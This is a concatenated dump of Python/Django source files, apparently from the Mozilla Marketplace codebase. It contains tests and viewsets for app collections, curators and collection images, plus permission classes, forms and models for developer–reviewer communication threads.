        eq_(response.status_code, 400)
        eq_(CollectionViewSet.exceptions['user_doesnt_exist'], body['detail'])
        response, body = self.add_curator(self.client,
                                          user_id='[email protected]')
        eq_(response.status_code, 400)
        eq_(CollectionViewSet.exceptions['user_doesnt_exist'], body['detail'])
    def test_add_curator_empty(self):
        """A payload without a `user` key yields a 400."""
        self.make_publisher()
        response, body = self.add_curator(self.client, user_id=False)
        eq_(response.status_code, 400)
        eq_(CollectionViewSet.exceptions['user_not_provided'], body['detail'])
    def test_add_curator_email(self):
        """The user may also be identified by email address."""
        self.make_curator()
        response, body = self.add_curator(self.client,
                                          user_id=self.user.email)
        eq_(response.status_code, 200)
        eq_(body[0]['id'], self.user.pk)
    def test_add_curator_garbage(self):
        """Values that are neither a pk nor a valid email yield a 400."""
        self.make_publisher()
        response, body = self.add_curator(self.client, user_id='garbage')
        eq_(response.status_code, 400)
        eq_(CollectionViewSet.exceptions['wrong_user_format'], body['detail'])
        response, body = self.add_curator(self.client, user_id='garbage@')
        eq_(response.status_code, 400)
        eq_(CollectionViewSet.exceptions['wrong_user_format'], body['detail'])
class TestCollectionViewSetRemoveCurator(BaseCollectionViewSetTest):
    """
    Tests the `remove-curator` action on CollectionViewSet.
    """
    def remove_curator(self, client, collection_id=None, user_id=None):
        """POST to remove-curator; defaults to removing self.user by pk.

        collection_id -- pk or slug of the collection (defaults to pk).
        user_id -- pk or email of the user to remove; pass False to send
            a payload with no `user` key at all.
        """
        if user_id is None:
            user_id = self.user.pk
        form_data = {'user': user_id} if user_id else {}
        # Bug fix: honor collection_id so test_remove_curator_slug actually
        # exercises the slug-based URL (it was silently ignored before).
        url = self.collection_url('remove-curator',
                                  collection_id or self.collection.pk)
        res = client.post(url, json.dumps(form_data))
        # A 205 response carries no body.
        data = json.loads(res.content) if res.content else None
        return res, data
    def test_remove_curator_anon(self):
        """Anonymous clients may not remove curators."""
        res, data = self.remove_curator(self.anon)
        eq_(res.status_code, 403)
        eq_(PermissionDenied.default_detail, data['detail'])
    def test_remove_curator_no_perms(self):
        """Clients without curate permission may not remove curators."""
        res, data = self.remove_curator(self.client)
        eq_(res.status_code, 403)
        eq_(PermissionDenied.default_detail, data['detail'])
    def test_remove_curator_has_perms(self):
        """A publisher may remove a curator."""
        self.make_publisher()
        res, data = self.remove_curator(self.client)
        eq_(res.status_code, 205)
    def test_remove_curator_slug(self):
        """The endpoint also resolves the collection by slug."""
        self.make_publisher()
        res, data = self.remove_curator(self.client,
                                        collection_id=self.collection.slug)
        eq_(res.status_code, 205)
    def test_remove_curator_as_curator(self):
        """A curator may remove curators (including themselves)."""
        self.make_curator()
        res, data = self.remove_curator(self.client)
        eq_(res.status_code, 205)
    def test_remove_curator_email(self):
        """The user may also be identified by email address."""
        self.make_curator()
        res, data = self.remove_curator(self.client, user_id=self.user.email)
        eq_(res.status_code, 205)
    def test_remove_curator_nonexistent(self):
        """An unknown pk or email yields a 400 with a specific message."""
        self.make_publisher()
        res, data = self.remove_curator(self.client, user_id=100000)
        eq_(res.status_code, 400)
        eq_(CollectionViewSet.exceptions['user_doesnt_exist'], data['detail'])
        res, data = self.remove_curator(self.client, user_id='[email protected]')
        eq_(res.status_code, 400)
        eq_(CollectionViewSet.exceptions['user_doesnt_exist'], data['detail'])
    def test_remove_curator_empty(self):
        """A payload without a `user` key yields a 400."""
        self.make_publisher()
        res, data = self.remove_curator(self.client, user_id=False)
        eq_(res.status_code, 400)
        eq_(CollectionViewSet.exceptions['user_not_provided'], data['detail'])
    def test_remove_curator_garbage(self):
        """Values that are neither a pk nor a valid email yield a 400."""
        self.make_publisher()
        res, data = self.remove_curator(self.client, user_id='garbage')
        eq_(res.status_code, 400)
        eq_(CollectionViewSet.exceptions['wrong_user_format'], data['detail'])
        res, data = self.remove_curator(self.client, user_id='garbage@')
        eq_(res.status_code, 400)
        eq_(CollectionViewSet.exceptions['wrong_user_format'], data['detail'])
class TestCollectionImageViewSet(RestOAuth):
    """Tests the collection image endpoint (PUT / GET / DELETE)."""
    def setUp(self):
        super(TestCollectionImageViewSet, self).setUp()
        self.collection = Collection.objects.create(
            **CollectionDataMixin.collection_data)
        self.url = reverse('collection-image-detail',
                           kwargs={'pk': self.collection.pk})
        # A tiny valid PNG, base64-decoded (Python 2 str codec).
        self.img = (
            'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABAQMAAAAl21bKAAAAA1BMVEUAAA'
            'Cnej3aAAAAAXRSTlMAQObYZgAAAApJREFUCNdjYAAAAAIAAeIhvDMAAAAA'
            'SUVORK5CYII=').decode('base64')
    def add_img(self):
        """Write self.img to the collection image path and fake its hash."""
        path = self.collection.image_path()
        storage.open(path, 'w').write(self.img)
        self.collection.update(image_hash='fakehash')
        return path
    def test_put(self, pk_or_slug=None):
        """PUT a data URI: stores a PNG and the hash of the raw data."""
        if pk_or_slug is None:
            pk_or_slug = self.collection.pk
        self.url = reverse('collection-image-detail', kwargs={'pk': pk_or_slug})
        self.assertApiUrlEqual(self.url,
            '/rocketfuel/collections/%s/image/' % pk_or_slug)
        self.grant_permission(self.profile, 'Collections:Curate')
        res = self.client.put(self.url, 'data:image/gif;base64,' + IMAGE_DATA)
        eq_(res.status_code, 204)
        assert os.path.exists(self.collection.image_path())
        self.collection.reload()
        ok_(self.collection.has_image)
        # The stored hash is computed from the original (pre-conversion)
        # image data, truncated to 8 chars.
        expected_hash = hashlib.md5(IMAGE_DATA.decode('base64')).hexdigest()
        eq_(self.collection.image_hash, expected_hash[:8])
        # The uploaded GIF is converted to PNG on the way in.
        im = Image.open(self.collection.image_path())
        im.verify()
        assert im.format == 'PNG'
    def test_put_slug(self):
        """PUT also works with a slug-based URL."""
        self.test_put(pk_or_slug=self.collection.slug)
    def test_replace_image(self):
        """PUT over an existing image replaces it."""
        self.add_img()
        self.test_put()
    def test_put_non_data_uri(self):
        """A body that is not a data URI is rejected with a 400."""
        self.grant_permission(self.profile, 'Collections:Curate')
        res = self.client.put(self.url, 'some junk')
        eq_(res.status_code, 400)
        ok_(not Collection.objects.get(pk=self.collection.pk).has_image)
    def test_put_non_image(self):
        """A data URI that is not an image is rejected with a 400."""
        self.grant_permission(self.profile, 'Collections:Curate')
        res = self.client.put(self.url, 'data:text/plain;base64,AAA=')
        eq_(res.status_code, 400)
        ok_(not Collection.objects.get(pk=self.collection.pk).has_image)
    def test_put_unauthorized(self):
        """PUT without curate permission is forbidden."""
        res = self.client.put(self.url, 'some junk')
        eq_(res.status_code, 403)
    @override_settings(XSENDFILE=True)
    def _test_get(self):
        """Shared GET assertions: x-sendfile header + long cache age."""
        img_path = self.add_img()
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(res[settings.XSENDFILE_HEADER], img_path)
        ok_('max-age=31536000' in res['Cache-Control'])
    def test_get(self):
        self.assertApiUrlEqual(self.url,
            '/rocketfuel/collections/%s/image/' % self.collection.pk)
        self._test_get()
    def test_get_slug(self):
        slug = self.collection.slug
        self.url = reverse('collection-image-detail', kwargs={'pk': slug})
        self.assertApiUrlEqual(self.url,
            '/rocketfuel/collections/%s/image/' % slug)
        self._test_get()
    def test_get_png(self):
        pk = self.collection.pk
        self.url = reverse('collection-image-detail',
                           kwargs={'pk': pk, 'format': 'png'})
        self.assertApiUrlEqual(self.url,
            '/rocketfuel/collections/%s/image.png' % pk)
        self._test_get()
    def test_get_png_slug(self):
        slug = self.collection.slug
        self.url = reverse('collection-image-detail',
                           kwargs={'pk': slug, 'format': 'png'})
        self.assertApiUrlEqual(self.url,
            '/rocketfuel/collections/%s/image.png' % slug)
        self._test_get()
    def test_get_no_image(self):
        """GET returns 404 when the collection has no image."""
        res = self.client.get(self.url)
        eq_(res.status_code, 404)
    def test_delete(self, url=None):
        """DELETE removes the image file and clears has_image."""
        self.grant_permission(self.profile, 'Collections:Curate')
        img_path = self.add_img()
        # Bug fix: use the `url` argument when provided so test_delete_slug
        # actually exercises the slug URL (the parameter was ignored before).
        res = self.client.delete(url or self.url)
        eq_(res.status_code, 204)
        ok_(not self.collection.reload().has_image)
        ok_(not storage.exists(img_path))
    def test_delete_slug(self):
        """DELETE also works with a slug-based URL."""
        url = reverse('collection-image-detail',
                      kwargs={'pk': self.collection.slug})
        self.test_delete(url)
    def test_delete_unauthorized(self):
        """DELETE without curate permission is forbidden."""
        res = self.client.delete(self.url)
        eq_(res.status_code, 403)
########NEW FILE########
__FILENAME__ = views
from django.core.exceptions import ValidationError
from django.core.files.storage import default_storage as storage
from django.core.validators import validate_email
from django.db import IntegrityError
from django.db.models import Q
from django.http import Http404
from django.utils.datastructures import MultiValueDictKeyError
from django.views.decorators.cache import cache_control
from PIL import Image
from rest_framework import generics, serializers, status, viewsets
from rest_framework.decorators import action, link
from rest_framework.exceptions import ParseError
from rest_framework.response import Response
from amo.utils import HttpResponseSendFile
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, MarketplaceView, SlugOrIdMixin
from mkt.collections.serializers import DataURLImageField
from mkt.webapps.models import Webapp
from users.models import UserProfile
from .authorization import (CanBeHeroAuthorization, CuratorAuthorization,
StrictCuratorAuthorization)
from .filters import CollectionFilterSetWithFallback
from .models import Collection
from .serializers import CollectionSerializer, CuratorSerializer
class CollectionViewSet(CORSMixin, SlugOrIdMixin, MarketplaceView,
                        viewsets.ModelViewSet):
    """
    CRUD API for collections, plus custom actions to duplicate a
    collection, manage its apps (add/remove/reorder) and manage its
    curators (list/add/remove).
    """
    serializer_class = CollectionSerializer
    queryset = Collection.objects.all()
    cors_allowed_methods = ('get', 'post', 'delete', 'patch')
    permission_classes = [CanBeHeroAuthorization, CuratorAuthorization]
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]
    filter_class = CollectionFilterSetWithFallback
    # Canonical error messages used by the custom actions below; tests
    # reference these by key.
    exceptions = {
        'not_provided': '`app` was not provided.',
        'user_not_provided': '`user` was not provided.',
        'wrong_user_format': '`user` must be an ID or email.',
        'doesnt_exist': '`app` does not exist.',
        'user_doesnt_exist': '`user` does not exist.',
        'not_in': '`app` not in collection.',
        'already_in': '`app` already exists in collection.',
        'app_mismatch': 'All apps in this collection must be included.',
    }
    def filter_queryset(self, queryset):
        """Filter, remembering fallback/errors set by the filter class
        on the queryset for use in list() below."""
        queryset = super(CollectionViewSet, self).filter_queryset(queryset)
        self.filter_fallback = getattr(queryset, 'filter_fallback', None)
        self.filter_errors = getattr(queryset, 'filter_errors', None)
        return queryset
    def list(self, request, *args, **kwargs):
        """List collections, exposing filter fallback info in a header and
        turning silent filtering errors into an explicit 400."""
        response = super(CollectionViewSet, self).list(
            request, *args, **kwargs)
        if response:
            filter_fallback = getattr(self, 'filter_fallback', None)
            if filter_fallback:
                response['API-Fallback'] = ','.join(filter_fallback)
            filter_errors = getattr(self, 'filter_errors', None)
            if filter_errors:
                # If we had errors filtering, the default behaviour of DRF
                # and django-filter is to produce an empty queryset and ignore
                # the problem. We want to fail loud and clear and expose the
                # errors instead.
                response.data = {
                    'detail': 'Filtering error.',
                    'filter_errors': filter_errors
                }
                response.status_code = status.HTTP_400_BAD_REQUEST
        return response
    def get_object(self, queryset=None):
        """
        Custom get_object implementation to prevent DRF from filtering when we
        do a specific pk/slug/etc lookup (we only want filtering on list API).
        Calls DRF's get_object() with the queryset (filtered or not), since DRF
        get_object() implementation will then just use the queryset without
        attempting to filter it.
        """
        if queryset is None:
            queryset = self.get_queryset()
        if (self.pk_url_kwarg not in self.kwargs and
            self.slug_url_kwarg not in self.kwargs and
            self.lookup_field not in self.kwargs):
            # Only filter queryset if we don't have an explicit lookup.
            queryset = self.filter_queryset(queryset)
        return super(CollectionViewSet, self).get_object(queryset=queryset)
    def get_queryset(self):
        """Restrict visibility: curators with the curate permission see
        everything; other authenticated users see public collections plus
        those they curate; anonymous users see only public ones."""
        auth = CuratorAuthorization()
        qs = super(CollectionViewSet, self).get_queryset()
        if self.request.user.is_authenticated():
            if auth.has_curate_permission(self.request):
                return qs
            profile = self.request.user
            return qs.filter(Q(curators__id=profile.id) |
                             Q(is_public=True)).distinct()
        return qs.filter(is_public=True)
    def return_updated(self, status, collection=None):
        """
        Passed an HTTP status from rest_framework.status, returns a response
        of that status with the body containing the updated values of
        self.object.
        """
        if collection is None:
            collection = self.get_object()
        serializer = self.get_serializer(instance=collection)
        return Response(serializer.data, status=status)
    @action()
    def duplicate(self, request, *args, **kwargs):
        """
        Duplicate the specified collection, copying over all fields and apps.
        Anything passed in request.DATA will override the corresponding value
        on the resulting object.
        """
        # Serialize data from specified object, removing the id and then
        # updating with custom data in request.DATA.
        collection = self.get_object()
        collection_data = self.get_serializer(instance=collection).data
        collection_data.pop('id')
        collection_data.update(request.DATA)
        # Pretend we didn't have anything in kwargs (removing 'pk').
        self.kwargs = {}
        # Override request.DATA with the result from above.
        request._data = collection_data
        # Now create the collection.
        result = self.create(request)
        if result.status_code != status.HTTP_201_CREATED:
            return result
        # And now, add apps from the original collection.
        for app in collection.apps():
            self.object.add_app(app)
        # Re-Serialize to include apps.
        return self.return_updated(status.HTTP_201_CREATED,
                                   collection=self.object)
    @action()
    def add_app(self, request, *args, **kwargs):
        """
        Add an app to the specified collection.
        """
        collection = self.get_object()
        try:
            new_app = Webapp.objects.get(pk=request.DATA['app'])
        except (KeyError, MultiValueDictKeyError):
            raise ParseError(detail=self.exceptions['not_provided'])
        except Webapp.DoesNotExist:
            raise ParseError(detail=self.exceptions['doesnt_exist'])
        try:
            collection.add_app(new_app)
        except IntegrityError:
            # The app is already in the collection (unique constraint).
            raise ParseError(detail=self.exceptions['already_in'])
        return self.return_updated(status.HTTP_200_OK)
    @action()
    def remove_app(self, request, *args, **kwargs):
        """
        Remove an app from the specified collection.
        """
        collection = self.get_object()
        try:
            to_remove = Webapp.objects.get(pk=request.DATA['app'])
        except (KeyError, MultiValueDictKeyError):
            raise ParseError(detail=self.exceptions['not_provided'])
        except Webapp.DoesNotExist:
            raise ParseError(detail=self.exceptions['doesnt_exist'])
        removed = collection.remove_app(to_remove)
        if not removed:
            # App wasn't in the collection; nothing to serialize back.
            return Response(status=status.HTTP_205_RESET_CONTENT)
        return self.return_updated(status.HTTP_200_OK)
    @action()
    def reorder(self, request, *args, **kwargs):
        """
        Reorder the specified collection.
        """
        collection = self.get_object()
        try:
            collection.reorder(request.DATA)
        except ValueError:
            # The client must send the complete list of apps.
            return Response({
                'detail': self.exceptions['app_mismatch'],
                'apps': [a.pk for a in collection.apps()]
            }, status=status.HTTP_400_BAD_REQUEST, exception=True)
        return self.return_updated(status.HTTP_200_OK)
    def serialized_curators(self, no_cache=False):
        """Serialize the collection's curators; no_cache bypasses the
        cache machine so freshly-added curators show up immediately."""
        queryset = self.get_object().curators.all()
        if no_cache:
            queryset = queryset.no_cache()
        return Response([CuratorSerializer(instance=c).data for c in queryset])
    def get_curator(self, request):
        """Resolve request.DATA['user'] (pk or email) to a UserProfile,
        translating lookup failures to ParseError with canonical messages."""
        try:
            userdata = request.DATA['user']
            # Either a numeric id (int or digit-string), or an email.
            if (isinstance(userdata, int) or isinstance(userdata, basestring)
                and userdata.isdigit()):
                return UserProfile.objects.get(pk=userdata)
            else:
                validate_email(userdata)
                return UserProfile.objects.get(email=userdata)
        except (KeyError, MultiValueDictKeyError):
            raise ParseError(detail=self.exceptions['user_not_provided'])
        except UserProfile.DoesNotExist:
            raise ParseError(detail=self.exceptions['user_doesnt_exist'])
        except ValidationError:
            raise ParseError(detail=self.exceptions['wrong_user_format'])
    @link(permission_classes=[StrictCuratorAuthorization])
    def curators(self, request, *args, **kwargs):
        """List this collection's curators."""
        return self.serialized_curators()
    @action(methods=['POST'])
    def add_curator(self, request, *args, **kwargs):
        """Add the user from request.DATA as a curator."""
        self.get_object().add_curator(self.get_curator(request))
        return self.serialized_curators(no_cache=True)
    @action(methods=['POST'])
    def remove_curator(self, request, *args, **kwargs):
        """Remove the user from request.DATA as a curator; 205 when the
        user was not a curator to begin with."""
        removed = self.get_object().remove_curator(self.get_curator(request))
        if not removed:
            return Response(status=status.HTTP_205_RESET_CONTENT)
        return self.serialized_curators(no_cache=True)
class CollectionImageViewSet(CORSMixin, SlugOrIdMixin, MarketplaceView,
                             generics.GenericAPIView, viewsets.ViewSet):
    """
    Raw image endpoint for a collection: GET serves the PNG, PUT accepts a
    base64 data URI, DELETE removes the image.
    """
    queryset = Collection.objects.all()
    permission_classes = [CuratorAuthorization]
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]
    cors_allowed_methods = ('get', 'put', 'delete')
    # Dummy serializer to keep DRF happy when it's answering to OPTIONS.
    serializer_class = serializers.Serializer
    def perform_content_negotiation(self, request, force=False):
        """
        Force DRF's content negociation to not raise an error - It wants to use
        the format passed to the URL, but we don't care since we only deal with
        "raw" content: we don't even use the renderers.
        """
        return super(CollectionImageViewSet, self).perform_content_negotiation(
            request, force=True)
    @cache_control(max_age=60 * 60 * 24 * 365)
    def retrieve(self, request, *args, **kwargs):
        """Serve the collection image (sendfile); 404 when none is set."""
        obj = self.get_object()
        if not obj.has_image:
            raise Http404
        return HttpResponseSendFile(request, obj.image_path(),
                                    content_type='image/png')
    def update(self, request, *args, **kwargs):
        """Accept a data URI body, convert it to PNG and store it; 400 on
        anything that is not a valid image data URI."""
        obj = self.get_object()
        try:
            img, hash_ = DataURLImageField().from_native(request.read())
        except ValidationError:
            return Response(status=status.HTTP_400_BAD_REQUEST)
        i = Image.open(img)
        with storage.open(obj.image_path(), 'wb') as f:
            i.save(f, 'png')
        # Store the hash of the original image data sent.
        obj.update(image_hash=hash_)
        return Response(status=status.HTTP_204_NO_CONTENT)
    def destroy(self, request, *args, **kwargs):
        """Delete the stored image (if any) and clear the hash."""
        obj = self.get_object()
        if obj.has_image:
            storage.delete(obj.image_path())
            obj.update(image_hash=None)
        return Response(status=status.HTTP_204_NO_CONTENT)
########NEW FILE########
__FILENAME__ = authorization
from django.conf import settings
from django.shortcuts import get_object_or_404
from rest_framework.permissions import BasePermission
from rest_framework.exceptions import PermissionDenied
from mkt.comm.models import (CommunicationNote, CommunicationThread,
user_has_perm_note, user_has_perm_thread)
class ThreadPermission(BasePermission):
    """
    Permission wrapper for checking if the authenticated user has the
    permission to view the thread.
    """
    def has_permission(self, request, view):
        # Let `has_object_permission` handle the permissions when we retrieve
        # an object.
        if view.action == 'retrieve':
            return True
        if not request.user.is_authenticated():
            raise PermissionDenied()
        return True
    def has_object_permission(self, request, view, obj):
        """
        Make sure we give correct permissions to read/write the thread.
        """
        # Anonymous users get access exactly when the thread is public;
        # for public threads authenticated users are allowed too.
        if not request.user.is_authenticated() or obj.read_permission_public:
            return obj.read_permission_public
        return user_has_perm_thread(obj, request.amo_user)
class NotePermission(ThreadPermission):
    """Permission for notes: requires access to the enclosing thread at the
    view level, plus note-level permission at the object level."""
    def has_permission(self, request, view):
        thread_id = view.kwargs.get('thread_id')
        # When only a note id is in the URL, derive the thread from the note.
        if not thread_id and view.kwargs.get('note_id'):
            note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
            thread_id = note.thread_id
        # We save the thread in the view object so we can use it later.
        view.comm_thread = get_object_or_404(CommunicationThread,
            id=thread_id)
        return ThreadPermission.has_object_permission(self,
            request, view, view.comm_thread)
    def has_object_permission(self, request, view, obj):
        # Has thread obj-level permission AND note obj-level permission.
        return user_has_perm_note(obj, request.amo_user)
class AttachmentPermission(NotePermission):
    """Permission for note attachments: both hooks check the parent note
    (looked up from the URL) rather than the attachment itself."""
    def has_permission(self, request, view):
        note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
        return NotePermission.has_object_permission(self, request, view, note)
    def has_object_permission(self, request, view, obj):
        # Has thread obj-level permission AND note obj-level permission.
        # NOTE: `obj` (the attachment) is deliberately ignored; access is
        # decided on the parent note from the URL kwargs.
        note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
        return NotePermission.has_object_permission(self, request, view, note)
class EmailCreationPermission(object):
    """Permit if client's IP address is whitelisted."""
    def has_permission(self, request, view):
        auth_token = request.META.get('HTTP_POSTFIX_AUTH_TOKEN')
        # NOTE(review): `not in` performs a substring/membership test
        # against settings.POSTFIX_AUTH_TOKEN — confirm whether equality
        # (or membership in a list of tokens) is the intended semantics.
        if auth_token and auth_token not in settings.POSTFIX_AUTH_TOKEN:
            return False
        # Only accept requests coming from whitelisted client IPs.
        remote_ip = request.META.get('REMOTE_ADDR')
        return remote_ip and (
            remote_ip in settings.WHITELISTED_CLIENTS_EMAIL_API)
########NEW FILE########
__FILENAME__ = forms
from django import forms
from django.conf import settings
from django.forms import ValidationError
import happyforms
from jinja2.filters import do_filesizeformat
from tower import ugettext as _, ugettext_lazy as _lazy
from mkt.api.forms import SluggableModelChoiceField
from mkt.comm.models import CommunicationThread
from mkt.constants import comm
from mkt.webapps.models import Webapp
class AppSlugForm(happyforms.Form):
    """Resolves an app slug (or pk) to a Webapp instance."""
    app = SluggableModelChoiceField(queryset=Webapp.objects.all(),
                                    sluggable_to_field_name='app_slug')
class CreateCommNoteForm(happyforms.Form):
    """Validates creation of a communication note (body + note type)."""
    body = forms.CharField(
        error_messages={'required': _lazy('Note body is empty.')})
    # Empty input coerces to NO_ACTION; otherwise must be a known note type.
    note_type = forms.TypedChoiceField(
        empty_value=comm.NO_ACTION,
        coerce=int, choices=[(x, x) for x in comm.NOTE_TYPES],
        error_messages={'invalid_choice': _lazy(u'Invalid note type.')})
class CreateCommThreadForm(CreateCommNoteForm):
    """Validates creation of a communication thread: resolves the app by
    slug and the version string to a concrete Version object."""
    app = SluggableModelChoiceField(queryset=Webapp.objects.all(),
                                    sluggable_to_field_name='app_slug')
    version = forms.CharField()
    def clean_version(self):
        """Return the newest Version of the app matching the given version
        string, or raise a validation error if none exists."""
        version_num = self.cleaned_data['version']
        versions = self.cleaned_data['app'].versions.filter(
            version=version_num).order_by('-created')
        if versions.exists():
            return versions[0]
        # Bug fix: interpolate AFTER translation — `_('... %s' % x)` looks
        # up the already-interpolated string, which is never in the catalog.
        raise forms.ValidationError(
            _('Version %s does not exist') % version_num)
class CommAttachmentForm(happyforms.Form):
    """Validates a single note attachment upload and its optional
    description, enforcing the configured maximum size."""
    attachment = forms.FileField(label=_lazy(u'Attachment:'))
    description = forms.CharField(required=False, label=_lazy(u'Description:'))
    max_upload_size = settings.MAX_REVIEW_ATTACHMENT_UPLOAD_SIZE
    def clean(self, *args, **kwargs):
        """Reject attachments larger than max_upload_size."""
        data = super(CommAttachmentForm, self).clean(*args, **kwargs)
        attachment = data.get('attachment')
        max_size = self.max_upload_size
        if attachment and attachment.size > max_size:
            # L10n: error raised when review attachment is too large.
            # Bug fix: interpolate AFTER translation so the msgid can be
            # found in the catalog.
            exc = _('Attachment exceeds maximum size of %s.') % (
                do_filesizeformat(self.max_upload_size))
            raise ValidationError(exc)
        return data
# Formset allowing several attachments to be uploaded with one note.
CommAttachmentFormSet = forms.formsets.formset_factory(CommAttachmentForm)
class UnCCForm(happyforms.Form):
    """Resolves a thread id to a CommunicationThread (used to un-CC a
    user from a thread)."""
    pk = SluggableModelChoiceField(
        queryset=CommunicationThread.objects.all(),
        sluggable_to_field_name='id')
########NEW FILE########
__FILENAME__ = migrate_activity_log
from django.core.management.base import BaseCommand
import commonware.log
import amo
from amo.utils import chunked
from devhub.models import ActivityLog, AppLog
from mkt.comm.tasks import _migrate_activity_log
log = commonware.log.getLogger('comm')
class Command(BaseCommand):
    help = ('Migrates ActivityLog objects to CommunicationNote objects. '
            'Meant for one time run only.')

    def handle(self, *args, **options):
        """Queue migration tasks for review-queue activity logs.

        Collects the ids of all ActivityLog rows referenced by an AppLog
        whose action is a review-queue action, then fans them out to the
        ``_migrate_activity_log`` celery task in chunks of 100.
        """
        applog_ids = AppLog.objects.values_list('activity_log', flat=True)
        ids = (ActivityLog.objects.filter(
            pk__in=list(applog_ids), action__in=amo.LOG_REVIEW_QUEUE)
            .order_by('created').values_list('id', flat=True))
        for log_chunk in chunked(ids, 100):
            # Bug fix: previously `ids` (the full list) was queued for
            # every chunk, so each log was migrated once per chunk. Queue
            # only the current chunk.
            _migrate_activity_log.delay(log_chunk)
########NEW FILE########
__FILENAME__ = models
import os
from datetime import datetime
import imghdr
from django.conf import settings
from django.db import models
from django.utils.safestring import mark_safe
import bleach
from uuidfield.fields import UUIDField
import amo.models
from access import acl
from amo.utils import reverse
from translations.fields import save_signal
from mkt.constants import comm
class CommunicationPermissionModel(amo.models.ModelBase):
    """Abstract base adding per-audience read flags to threads/notes."""
    # Read permissions imply write permissions as well.
    read_permission_public = models.BooleanField(default=False)
    read_permission_developer = models.BooleanField(default=True)
    read_permission_reviewer = models.BooleanField(default=True)
    read_permission_senior_reviewer = models.BooleanField(default=True)
    read_permission_mozilla_contact = models.BooleanField(default=True)
    read_permission_staff = models.BooleanField(default=True)
    class Meta:
        abstract = True
def check_acls(user, obj, acl_type):
    """Check whether `user` passes the ACL check named `acl_type`.

    `obj` is only consulted for the 'moz_contact' check, where it may be
    either an object with an `addon` attribute (e.g. a thread) or one
    with a `thread` attribute (e.g. a note).

    Raises Exception for an unknown `acl_type`.
    """
    if acl_type == 'moz_contact':
        try:
            return user.email in obj.addon.get_mozilla_contacts()
        except AttributeError:
            # `obj` is a note; reach the addon through its thread.
            return user.email in obj.thread.addon.get_mozilla_contacts()
    if acl_type == 'admin':
        return acl.action_allowed_user(user, 'Admin', '%')
    elif acl_type == 'reviewer':
        return acl.action_allowed_user(user, 'Apps', 'Review')
    elif acl_type == 'senior_reviewer':
        return acl.action_allowed_user(user, 'Apps', 'ReviewEscalated')
    else:
        raise Exception('Invalid ACL lookup.')
    # (Removed the unreachable `return False` that followed the raise.)
def check_acls_comm_obj(obj, profile):
    """Cross-reference ACLs and Note/Thread permissions."""
    if obj.read_permission_public:
        return True
    # Map each object-level read flag to the ACL that grants it; grant
    # access on the first matching pair (same order as before).
    acl_checks = (
        ('read_permission_reviewer', 'reviewer'),
        ('read_permission_senior_reviewer', 'senior_reviewer'),
        ('read_permission_mozilla_contact', 'moz_contact'),
        ('read_permission_staff', 'admin'),
    )
    for perm_field, acl_type in acl_checks:
        if getattr(obj, perm_field) and check_acls(profile, obj, acl_type):
            return True
    return False
def user_has_perm_app(user, app):
    """
    Check if user has any app-level ACLs.
    (Mozilla contact, admin, review, senior reviewer, developer).
    """
    # Guard-clause form; same checks in the same order as the original
    # `or` chain, so short-circuiting is preserved.
    if check_acls(user, None, 'reviewer'):
        return True
    if user.addons.filter(pk=app.id).exists():
        return True
    if check_acls(user, None, 'senior_reviewer'):
        return True
    if check_acls(user, None, 'admin'):
        return True
    return user.email in app.get_mozilla_contacts()
def user_has_perm_thread(thread, profile):
    """
    Check if the user has read/write permissions on the given thread.

    Developers of the add-on used in the thread, users in the CC list,
    and users who post to the thread are allowed to access the object.
    Moreover, other object permissions are also checked against the ACLs
    of the user.
    """
    # Anyone who has posted to the thread has access.
    if CommunicationNote.objects.filter(author=profile,
                                        thread=thread).exists():
        return True
    # Anyone on the CC list has access.
    if CommunicationThreadCC.objects.filter(user=profile,
                                            thread=thread).exists():
        return True
    # Developers of the add-on, when the thread allows developer reads.
    if (thread.read_permission_developer and
            profile.addons.filter(pk=thread.addon_id).exists()):
        return True
    return check_acls_comm_obj(thread, profile)
def user_has_perm_note(note, profile):
    """
    Check if the user has read/write permissions on the given note.

    The note's author always has access. Developers of the note's add-on
    have access when the note grants developer reads. Everyone else is
    checked against the ACL cross-reference.
    """
    # Authors can always read their own notes.
    if note.author.id == profile.id:
        return True
    # Developer of the add-on, when the note allows developer reads.
    if (note.read_permission_developer and
            profile.addons.filter(pk=note.thread.addon_id).exists()):
        return True
    return check_acls_comm_obj(note, profile)
class CommunicationThread(CommunicationPermissionModel):
    """A communication thread, unique per (addon, version) pair."""
    addon = models.ForeignKey('addons.Addon', related_name='threads')
    version = models.ForeignKey('versions.Version', related_name='threads',
                                null=True)
    class Meta:
        db_table = 'comm_threads'
        unique_together = ('addon', 'version')
    def join_thread(self, user):
        """Subscribe `user` to this thread (idempotent)."""
        return self.thread_cc.get_or_create(user=user)
class CommunicationThreadCC(amo.models.ModelBase):
    """
    Determines recipients of emails. Akin being joined on a thread.
    """
    # One row per (user, thread) subscription.
    thread = models.ForeignKey(CommunicationThread,
                               related_name='thread_cc')
    user = models.ForeignKey('users.UserProfile',
                             related_name='comm_thread_cc')
    class Meta:
        db_table = 'comm_thread_cc'
        unique_together = ('user', 'thread',)
def cc_auto_mark_all_read(sender, instance, **kw):
    """When someone joins thread, mark all old messages read."""
    # Imported here to avoid a circular import at module load time.
    from mkt.comm.tasks import mark_thread_read
    mark_thread_read.delay(instance.thread, instance.user)
# Fires after a CC row is created, i.e. whenever a user joins a thread.
models.signals.post_save.connect(
    cc_auto_mark_all_read, sender=CommunicationThreadCC,
    dispatch_uid='cc_auto_mark_read')
class CommunicationNoteManager(models.Manager):
    """Manager adding a permission-filtered queryset helper."""
    def with_perms(self, profile, thread):
        """Return the thread's notes that `profile` is allowed to read."""
        visible_ids = []
        for note in self.filter(thread=thread):
            if user_has_perm_note(note, profile):
                visible_ids.append(note.id)
        return self.filter(id__in=visible_ids)
class CommunicationNote(CommunicationPermissionModel):
    """A single message (note) within a CommunicationThread."""
    thread = models.ForeignKey(CommunicationThread, related_name='notes')
    author = models.ForeignKey('users.UserProfile', related_name='comm_notes')
    # One of the mkt.constants.comm.NOTE_TYPES values.
    note_type = models.IntegerField(default=comm.NO_ACTION)
    body = models.TextField(null=True)
    reply_to = models.ForeignKey(
        'self', related_name='replies', null=True, blank=True)
